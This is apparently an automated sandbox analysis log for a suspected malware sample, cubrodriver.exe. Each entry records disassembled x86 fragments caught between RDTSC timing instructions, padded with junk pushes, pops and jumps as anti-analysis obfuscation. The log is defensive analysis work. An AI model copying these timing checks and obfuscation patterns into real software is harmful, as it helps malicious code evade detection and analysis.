Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B4A0 second address: 65B4FE instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 jmp 00007F01B4D45EE2h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b jmp 00007F01B4D45EE4h 0x00000010 pop ebx 0x00000011 pushad 0x00000012 jnl 00007F01B4D45ED8h 0x00000018 push eax 0x00000019 pushad 0x0000001a popad 0x0000001b jmp 00007F01B4D45EDEh 0x00000020 pop eax 0x00000021 push eax 0x00000022 push edx 0x00000023 jmp 00007F01B4D45EE2h 0x00000028 push esi 0x00000029 pop esi 0x0000002a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 65B4FE second address: 65B502 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 665E71 second address: 665E81 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jnc 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c push eax 0x0000000d push edx 0x0000000e push eax 0x0000000f push edx 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 665E81 second address: 665E87 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 66492A second address: 66492E instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 66492E second address: 664932 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664932 second address: 66493A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 pop eax 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 66493A second address: 664962 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA2h 0x00000007 push edx 0x00000008 jnc 00007F01B44E8C96h 0x0000000e pop edx 0x0000000f pop edx 0x00000010 pop eax 0x00000011 push eax 0x00000012 push edx 0x00000013 jo 00007F01B44E8C98h 0x00000019 pushad 0x0000001a popad 0x0000001b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664962 second address: 66498D instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B4D45EE8h 0x00000009 jmp 00007F01B4D45EDFh 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 66498D second address: 6649C0 instructions: 0x00000000 rdtsc 0x00000002 jnc 00007F01B44E8C96h 0x00000008 jmp 00007F01B44E8CA2h 0x0000000d pop edx 0x0000000e pop eax 0x0000000f push eax 0x00000010 push edx 0x00000011 jmp 00007F01B44E8C9Fh 0x00000016 jnl 00007F01B44E8C96h 0x0000001c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664C55 second address: 664C62 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jne 00007F01B4D45ED6h 0x00000009 push ebx 0x0000000a pop ebx 0x0000000b push eax 0x0000000c push edx 0x0000000d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664EBC second address: 664EC2 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664EC2 second address: 664ECA instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 push edi 0x00000006 push eax 0x00000007 push edx 0x00000008 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664ECA second address: 664EDD instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B44E8C9Eh 0x00000009 pop edi 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 664EDD second address: 664EE6 instructions: 0x00000000 rdtsc 0x00000002 push ecx 0x00000003 push edi 0x00000004 pop edi 0x00000005 pop ecx 0x00000006 pushad 0x00000007 push eax 0x00000008 push edx 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 665190 second address: 665194 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 665B79 second address: 665B8F instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 pop edx 0x00000005 pop eax 0x00000006 jmp 00007F01B4D45EDAh 0x0000000b pop esi 0x0000000c push eax 0x0000000d push edx 0x0000000e push edx 0x0000000f push eax 0x00000010 push edx 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 665B8F second address: 665BA4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 pop edx 0x00000007 push edi 0x00000008 jo 00007F01B44E8C96h 0x0000000e jl 00007F01B44E8C96h 0x00000014 pop edi 0x00000015 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 668ACF second address: 668B1B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B4D45EE3h 0x00000009 popad 0x0000000a pushad 0x0000000b push esi 0x0000000c pop esi 0x0000000d jne 00007F01B4D45ED6h 0x00000013 pushad 0x00000014 popad 0x00000015 pushad 0x00000016 popad 0x00000017 popad 0x00000018 jmp 00007F01B4D45EDFh 0x0000001d popad 0x0000001e push edx 0x0000001f push eax 0x00000020 push edx 0x00000021 jmp 00007F01B4D45EDDh 0x00000026 jo 00007F01B4D45ED6h 0x0000002c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6686B6 second address: 6686BA instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6740EE second address: 67410F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 jmp 00007F01B4D45EE5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push eax 0x0000000c push edx 0x0000000d push edx 0x0000000e pop edx 0x0000000f pushad 0x00000010 popad 0x00000011 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 681A77 second address: 681A7D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 683AE0 second address: 683AEC instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 push eax 0x00000007 push edx 0x00000008 push edx 0x00000009 pop edx 0x0000000a pushad 0x0000000b popad 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 683AEC second address: 683AF6 instructions: 0x00000000 rdtsc 0x00000002 js 00007F01B44E8C96h 0x00000008 pop edx 0x00000009 pop eax 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A2F4 second address: 68A2F8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A451 second address: 68A46D instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jnc 00007F01B44E8C96h 0x0000000a jmp 00007F01B44E8C9Bh 0x0000000f popad 0x00000010 push edx 0x00000011 pushad 0x00000012 popad 0x00000013 pushad 0x00000014 popad 0x00000015 pop edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A46D second address: 68A4AA instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EE1h 0x00000007 push ebx 0x00000008 jmp 00007F01B4D45EDFh 0x0000000d pushad 0x0000000e popad 0x0000000f pop ebx 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jp 00007F01B4D45EDCh 0x00000019 jne 00007F01B4D45ED6h 0x0000001f push eax 0x00000020 push edx 0x00000021 jo 00007F01B4D45ED6h 0x00000027 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A63F second address: 68A643 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A643 second address: 68A669 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jne 00007F01B4D45ED6h 0x0000000a pop edx 0x0000000b pop eax 0x0000000c pushad 0x0000000d push edi 0x0000000e pop edi 0x0000000f jmp 00007F01B4D45EE5h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A7A8 second address: 68A7B4 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jno 00007F01B44E8C96h 0x0000000a push eax 0x0000000b push edx 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A931 second address: 68A955 instructions: 0x00000000 rdtsc 0x00000002 push esi 0x00000003 pop esi 0x00000004 jmp 00007F01B4D45EE5h 0x00000009 pop edx 0x0000000a pop eax 0x0000000b pushad 0x0000000c jng 00007F01B4D45ED6h 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A955 second address: 68A95B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A95B second address: 68A962 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push ebx 0x00000005 pop ebx 0x00000006 popad 0x00000007 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68A962 second address: 68A97F instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 jmp 00007F01B44E8CA8h 0x00000008 push eax 0x00000009 push edx 0x0000000a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68AC4E second address: 68AC5A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push eax 0x00000005 push edx 0x00000006 jne 00007F01B4D45ED6h 0x0000000c rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68AC5A second address: 68AC73 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Fh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 popad 0x0000000a push eax 0x0000000b push edx 0x0000000c push ebx 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68AC73 second address: 68AC86 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ebx 0x00000005 jnp 00007F01B4D45EDEh 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68AC86 second address: 68AC8B instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push eax 0x00000004 push edx 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68B086 second address: 68B0D0 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 push edx 0x00000004 pop edx 0x00000005 jmp 00007F01B4D45EE0h 0x0000000a popad 0x0000000b jmp 00007F01B4D45EDAh 0x00000010 pop edx 0x00000011 pop eax 0x00000012 pushad 0x00000013 jmp 00007F01B4D45EDCh 0x00000018 push eax 0x00000019 push edx 0x0000001a push esi 0x0000001b pop esi 0x0000001c jmp 00007F01B4D45EE7h 0x00000021 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68B0D0 second address: 68B0D4 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68B275 second address: 68B279 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68B279 second address: 68B297 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pushad 0x00000007 jl 00007F01B44E8C96h 0x0000000d jmp 00007F01B44E8C9Fh 0x00000012 push eax 0x00000013 push edx 0x00000014 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68D042 second address: 68D051 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 jo 00007F01B4D45ED6h 0x0000000c pushad 0x0000000d popad 0x0000000e popad 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68D051 second address: 68D057 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68D057 second address: 68D05B instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68D05B second address: 68D05F instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68D05F second address: 68D076 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 jmp 00007F01B4D45EDEh 0x00000009 pop edx 0x0000000a pop eax 0x0000000b push esi 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68FCD0 second address: 68FCEC instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA3h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a pushad 0x0000000b push ecx 0x0000000c push eax 0x0000000d push edx 0x0000000e rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68FCEC second address: 68FD55 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop ecx 0x00000005 push ebx 0x00000006 push ebx 0x00000007 pop ebx 0x00000008 pop ebx 0x00000009 popad 0x0000000a nop 0x0000000b mov edx, dword ptr [ebp+124583A1h] 0x00000011 push 00000004h 0x00000013 call 00007F01B4D45EE3h 0x00000018 jmp 00007F01B4D45EE4h 0x0000001d pop edx 0x0000001e or edx, dword ptr [ebp+122D1E90h] 0x00000024 call 00007F01B4D45ED9h 0x00000029 jmp 00007F01B4D45EE5h 0x0000002e push eax 0x0000002f push ebx 0x00000030 jo 00007F01B4D45EDCh 0x00000036 push eax 0x00000037 push edx 0x00000038 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 68FF7F second address: 68FFDD instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a mov dword ptr [esp], eax 0x0000000d jmp 00007F01B44E8C9Eh 0x00000012 push dword ptr [ebp+12451E65h] 0x00000018 push 00000000h 0x0000001a push ebx 0x0000001b call 00007F01B44E8C98h 0x00000020 pop ebx 0x00000021 mov dword ptr [esp+04h], ebx 0x00000025 add dword ptr [esp+04h], 0000001Dh 0x0000002d inc ebx 0x0000002e push ebx 0x0000002f ret 0x00000030 pop ebx 0x00000031 ret 0x00000032 push 6C4EBF16h 0x00000037 pushad 0x00000038 pushad 0x00000039 push eax 0x0000003a push edx 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 69317D second address: 693186 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 push edi 0x00000005 pop edi 0x00000006 pushad 0x00000007 popad 0x00000008 popad 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 693186 second address: 69318C instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 69318C second address: 693190 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 693190 second address: 6931C3 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA2h 0x00000007 jmp 00007F01B44E8CA9h 0x0000000c pop edx 0x0000000d pop eax 0x0000000e push eax 0x0000000f push edx 0x00000010 push eax 0x00000011 push edx 0x00000012 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 6931C3 second address: 6931C9 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pushad 0x00000005 popad 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 402CE0 second address: 402CE0 instructions: 0x00000000 rdtsc 0x00000002 push ebp 0x00000003 mov ebp, esp 0x00000005 push ebx 0x00000006 push edi 0x00000007 push esi 0x00000008 imul eax, eax, 001E7319h 0x0000000e add eax, 3CFB5543h 0x00000013 rcr eax, 10h 0x00000016 add eax, esi 0x00000018 imul eax, edi 0x0000001b xor edx, edx 0x0000001d mul dword ptr [ebp+08h] 0x00000020 mov eax, edx 0x00000022 pop esi 0x00000023 pop edi 0x00000024 pop ebx 0x00000025 leave 0x00000026 retn 0004h 0x00000029 lea eax, dword ptr [eax+00000300h] 0x0000002f push eax 0x00000030 push 00405BFCh 0x00000035 call 00007F01B44EA665h 0x0000003a push ebp 0x0000003b mov ebp, esp 0x0000003d push ebx 0x0000003e push edi 0x0000003f push esi 0x00000040 mov edi, dword ptr [ebp+08h] 0x00000043 push 000000FFh 0x00000048 call 00007F01B44E8F6Eh 0x0000004d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49307AA second address: 49307AE instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49307AE second address: 49307B2 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49307B2 second address: 49307B8 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493081A second address: 493082A instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8C9Ch 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493082A second address: 493082E instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930944 second address: 493094A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 popad 0x00000004 pop edx 0x00000005 pop eax 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493082E second address: 4930846 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 pop edx 0x00000005 pop eax 0x00000006 pop edx 0x00000007 pop eax 0x00000008 push eax 0x00000009 push eax 0x0000000a push edx 0x0000000b jmp 00007F01B4D45EDDh 0x00000010 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 493094A second address: 4930950 instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 push eax 0x00000005 push edx 0x00000006 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930846 second address: 49308B7 instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 pushfd 0x00000004 jmp 00007F01B4D45EE7h 0x00000009 jmp 00007F01B4D45EE3h 0x0000000e popfd 0x0000000f pushfd 0x00000010 jmp 00007F01B4D45EE8h 0x00000015 xor cx, EA58h 0x0000001a jmp 00007F01B4D45EDBh 0x0000001f popfd 0x00000020 popad 0x00000021 pop edx 0x00000022 pop eax 0x00000023 xchg eax, ebp 0x00000024 push eax 0x00000025 push edx 0x00000026 push eax 0x00000027 push edx 0x00000028 jmp 00007F01B4D45EE0h 0x0000002d rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930950 second address: 4930954 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49308B7 second address: 49308C6 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B4D45EDBh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930954 second address: 4930973 instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8C9Eh 0x00000007 pop edx 0x00000008 pop eax 0x00000009 pop edx 0x0000000a pop eax 0x0000000b xchg eax, ebp 0x0000000c push eax 0x0000000d push edx 0x0000000e pushad 0x0000000f mov ebx, 2030F980h 0x00000014 push eax 0x00000015 push edx 0x00000016 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930973 second address: 4930978 instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 popad 0x00000005 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4930978 second address: 4930A1B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA4h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 push eax 0x0000000a jmp 00007F01B44E8C9Bh 0x0000000f xchg eax, ebp 0x00000010 pushad 0x00000011 jmp 00007F01B44E8CA4h 0x00000016 push ecx 0x00000017 jmp 00007F01B44E8CA1h 0x0000001c pop ecx 0x0000001d popad 0x0000001e mov ebp, esp 0x00000020 jmp 00007F01B44E8CA7h 0x00000025 pop ebp 0x00000026 pushad 0x00000027 movzx ecx, di 0x0000002a push eax 0x0000002b push edx 0x0000002c pushfd 0x0000002d jmp 00007F01B44E8CA7h 0x00000032 add al, 0000007Eh 0x00000035 jmp 00007F01B44E8CA9h 0x0000003a popfd 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491050A second address: 491054A instructions: 0x00000000 rdtsc 0x00000002 pushad 0x00000003 movsx edi, si 0x00000006 jmp 00007F01B4D45EE8h 0x0000000b popad 0x0000000c pop edx 0x0000000d pop eax 0x0000000e xchg eax, ebp 0x0000000f pushad 0x00000010 mov bx, si 0x00000013 push eax 0x00000014 push edx 0x00000015 jmp 00007F01B4D45EE8h 0x0000001a rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491054A second address: 49105CF instructions: 0x00000000 rdtsc 0x00000002 call 00007F01B44E8CA2h 0x00000007 pop esi 0x00000008 pop edx 0x00000009 pop eax 0x0000000a popad 0x0000000b push eax 0x0000000c pushad 0x0000000d mov ax, AB8Dh 0x00000011 pushfd 0x00000012 jmp 00007F01B44E8C9Ah 0x00000017 sub eax, 35D20FA8h 0x0000001d jmp 00007F01B44E8C9Bh 0x00000022 popfd 0x00000023 popad 0x00000024 xchg eax, ebp 0x00000025 pushad 0x00000026 pushfd 0x00000027 jmp 00007F01B44E8CA4h 0x0000002c and ax, 8208h 0x00000031 jmp 00007F01B44E8C9Bh 0x00000036 popfd 0x00000037 popad 0x00000038 mov ebp, esp 0x0000003a jmp 00007F01B44E8CA5h 0x0000003f xchg eax, ecx 0x00000040 pushad 0x00000041 push eax 0x00000042 push edx 0x00000043 mov esi, 5C6C1EB9h 0x00000048 rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 49105CF second address: 4910660 instructions: 0x00000000 rdtsc 0x00000002 pushfd 0x00000003 jmp 00007F01B4D45EE6h 0x00000008 sbb si, 76C8h 0x0000000d jmp 00007F01B4D45EDBh 0x00000012 popfd 0x00000013 pop edx 0x00000014 pop eax 0x00000015 pushfd 0x00000016 jmp 00007F01B4D45EE8h 0x0000001b and al, 00000028h 0x0000001e jmp 00007F01B4D45EDBh 0x00000023 popfd 0x00000024 popad 0x00000025 push eax 0x00000026 push eax 0x00000027 push edx 0x00000028 pushad 0x00000029 mov dl, ah 0x0000002b pushfd 0x0000002c jmp 00007F01B4D45EE7h 0x00000031 sub cl, 0000001Eh 0x00000034 jmp 00007F01B4D45EE9h 0x00000039 popfd 0x0000003a popad 0x0000003b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 4910660 second address: 491067B instructions: 0x00000000 rdtsc 0x00000002 jmp 00007F01B44E8CA1h 0x00000007 pop edx 0x00000008 pop eax 0x00000009 xchg eax, ecx 0x0000000a push eax 0x0000000b push edx 0x0000000c pushad 0x0000000d push eax 0x0000000e push edx 0x0000000f rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491067B second address: 491069A instructions: 0x00000000 rdtsc 0x00000002 pop edx 0x00000003 pop eax 0x00000004 call 00007F01B4D45EE9h 0x00000009 pop ecx 0x0000000a popad 0x0000000b rdtsc
Source: C:\Users\user\AppData\Roaming\10000840100\cubrodriver.exe	RDTSC instruction interceptor: First address: 491069A second address: 49106AB instructions: 0x00000000 rdtsc 0x00000002 push eax 0x00000003 push edx 0x00000004 jmp 00007F01B44E8C9Dh 0x00000009 rdtsc
